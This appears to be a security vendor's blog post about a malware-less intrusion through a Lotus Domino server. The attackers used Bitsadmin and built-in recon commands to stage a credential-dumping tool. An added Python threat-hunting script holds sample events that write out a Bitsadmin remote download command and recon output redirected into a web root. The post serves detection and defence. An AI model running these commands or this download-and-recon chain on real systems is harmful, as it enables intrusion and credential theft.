When we tell customers that malware is just a minor part of the overall security breach problem, they often ask what a malware-less attack looks like and whether such attacks really happen. Here is an example recently detected by us here at Falcon Overwatch.
The adversary took advantage of a public-facing Lotus Domino server in the customer’s environment to gain a foothold on two hosts without the use of malware. The attackers then used the native Bitsadmin utility, a tool developed by Microsoft and shipped as part of the Windows operating system, to download NBTScan onto those systems. NBTScan is a network scanner commonly used by pen testers for reconnaissance. It is important to stress that the adversary used an existing, legitimate program to download another common networking tool that is itself available from legitimate websites. At this point, they had still neither deployed nor leveraged a single piece of malware, nor had they relied on any malicious or compromised websites. As a result, they successfully stayed under the radar of security products that look for static, atomic indicators, malicious binaries or common exploits.
With their beachhead established, the adversary started to probe our customer’s environment using commands that are part of the compromised host’s operating system, such as net user, whoami, ipconfig, netstat and quser (among others). The results of this reconnaissance were redirected into text files in the public-facing Lotus Domino folders on the compromised hosts, allowing the actor to retrieve them easily over the web. Looked at individually, each of those actions is perfectly legitimate administrative activity.
When their reconnaissance was done, the adversary used Bitsadmin once more, this time to download a heavier tool. The tool deployed by the adversary was not a common or publicly available one. Our Intelligence team found that it had extensive overlaps with Mimikatz, PWDumpX and Windows Credential Editor, three commonly used password dumping tools. This real-time intelligence allowed us in Overwatch to recognize in a timely manner that the attackers were about to attempt to steal credentials. Furthermore, a good understanding of the tool’s parameters and functionality, in conjunction with alerts generated by the Falcon sensor, allowed us to see exactly what they were doing.
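The two behaviours described above, a Bitsadmin download from a remote URL followed by built-in reconnaissance commands whose output is redirected into a web-served Domino folder, can be hunted for in process-execution telemetry. The following is an added illustration, not CrowdStrike’s code or the Falcon sensor’s logic; the event records, host names and the Domino web-root path are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-execution events (not telemetry from the incident).
# Fields: host, image name, full command line.
EVENTS = [
    ("WEB01", "bitsadmin.exe", "bitsadmin /transfer job /download /priority high "
                               "http://example.invalid/nbtscan.exe C:\\Windows\\Temp\\nbtscan.exe"),
    ("WEB01", "cmd.exe", 'cmd /c net user > "C:\\Domino\\data\\domino\\html\\u.txt"'),
    ("WEB01", "cmd.exe", 'cmd /c whoami > "C:\\Domino\\data\\domino\\html\\w.txt"'),
    ("WEB02", "cmd.exe", "cmd /c ipconfig /all > C:\\Domino\\data\\domino\\html\\ip.txt"),
    ("ADMIN7", "cmd.exe", "cmd /c ipconfig /all"),      # routine admin use, no redirect
    ("ADMIN7", "bitsadmin.exe", "bitsadmin /list"),      # benign Bitsadmin use, no download
]

# Built-in commands the post lists as used for reconnaissance (plus nbtscan itself).
RECON_TOOLS = {"net", "net1", "whoami", "ipconfig", "netstat", "quser", "nbtscan"}
# Assumed web-served directory of the Domino install; set to the real deployment's path.
WEB_ROOT = r"c:\domino\data\domino\html"

def is_bits_download(cmdline):
    """Bitsadmin used to fetch a file from a remote URL (living-off-the-land download)."""
    c = cmdline.lower()
    return "bitsadmin" in c and "/transfer" in c and re.search(r"https?://", c) is not None

def recon_to_web_root(cmdline):
    """A recon command whose output is redirected into the web-served folder."""
    c = cmdline.lower().strip()
    # Drop a leading "cmd /c" (or "cmd.exe /k") wrapper so the real tool is the first token.
    c = re.sub(r'^"?[^"\s]*cmd(?:\.exe)?"?\s+/[ck]\s+', "", c)
    if ">" not in c:
        return False
    left, _, right = c.partition(">")
    tokens = left.split()
    if not tokens:
        return False
    tool = tokens[0].rsplit("\\", 1)[-1]
    tool = tool[:-4] if tool.endswith(".exe") else tool
    target = right.strip().strip('"')
    return tool in RECON_TOOLS and target.startswith(WEB_ROOT)

def hunt(events):
    """Map host -> finding; a host showing both behaviours is flagged as a chain."""
    findings = defaultdict(set)
    for host, _image, cmdline in events:
        if is_bits_download(cmdline):
            findings[host].add("bitsadmin_download")
        if recon_to_web_root(cmdline):
            findings[host].add("recon_output_in_web_root")
    return {h: ("chain" if len(f) == 2 else next(iter(f))) for h, f in findings.items()}

if __name__ == "__main__":
    for host, verdict in sorted(hunt(EVENTS).items()):
        print(host, verdict)
```

Either behaviour on its own is worth a look, but the same host showing both within a short window is the pattern that separates this intrusion from routine administration.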
Falcon Overwatch provides near real-time close support to customers to detect and prevent intrusions, even when no malware is present. Using our hunting patterns and discovery methods, we were able to identify the attack before any known malware was deployed and, subsequently, to augment the real-time alerting from the Falcon sensor. The customer knew the attack vector, and which hosts and accounts were compromised, before the adversary could leverage them to steal company intellectual property.
At CrowdStrike, our goal is to provide customers with timely, actionable alerts and intelligence to mitigate the impact of serious breaches by hands-on adversaries. Proactive threat hunting, combined with real-time endpoint detection and response (EDR), allows us to solve one of the most difficult problems in the security industry — silent failure.